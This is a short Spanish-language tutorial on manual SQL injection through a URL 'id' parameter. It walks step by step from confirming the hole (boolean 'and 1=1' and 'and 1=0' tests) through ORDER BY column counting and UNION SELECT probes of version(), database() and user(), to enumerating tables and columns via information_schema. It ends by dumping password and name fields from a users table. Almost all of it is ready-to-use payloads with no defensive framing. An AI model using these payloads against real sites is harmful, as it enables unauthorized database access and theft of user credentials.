miramos si esta bien la web: ?id=1+and+1=1 comprobamos que sea vulnerable: ?id=1+and+1=0 Le sacamos el numero de columnas de la tabla, hasta que de error o sea diferente: id=1+order+by+1 o 2 o 3..etc veremos los caracteres en los que se imprime los textos: id=-1+union+select+1,2,3,4,5,6 Union: Se usa para combinar los resultados de varias sentencias SELECT. Select: Nos permite consultar los datos almacenados en una tabla de la base de datos. podemos imprimir estos resultados: version(): Devuelve la versión del servidor SQL. database(): Devuelve el nombre de la base de datos. user(): Devuelve el nombre de usuario conectado a la base de datos. connection_id(): Devuelve el ID de una conexión. Cada conexión tiene su propio y único ID. ejemplo id=-1+union+select+version(),2,3,database(),user(),connection_id() daria la version en el 1 caracter imprimible, despues el nombre de la base de datos, el usuario conectado a ella y su id miramos todas las tablas: id=-1+union+select+table_name,2,3,4,5,6+from+information_schema.tables+limit+1,1 id=-1+union+select+table_name,2,3,4,5,6+from+information_schema.tables+limit+2,1.... o tambien asi id=-1+union+select+group_concat(table_name),2,3,4,5,6+from+information_schema.tables esta imprime todas las tablas miramos las columnas, tienes que tener el texto en ascii de la columna: id=-1+union+select+column_name,2,3,4,5,6+from+information_schema.columns+where+table_name=char(NombreDeLaTablaEnAscii)+and+column_name+like+char(37,64,37) id=-1+union+select+column_name,2,3,4,5,6+from+information_schema.columns+where+table_name=char(NombreDeLaTablaEnAscii)+and+column_name+like+char(37,65,37).... o tambien asi: id=-1+union+select+group_concat(column_name),2,3,4,5,6+from+information_schema.columns+where+table_name=char(NombreDeLaTablaEnAscii) que imprimiria todas las columnas cuando se tenga las columnas que se quieran se ejecutaria esto: id=-1+union+select+nombre de la columna,2,3,nombre de la columna,5,6+from+nombre de la tabla para ver los datos del siguiente usuario: id=-1+union+select+pass,2,3,nombre,5,6+from+users+where+id=2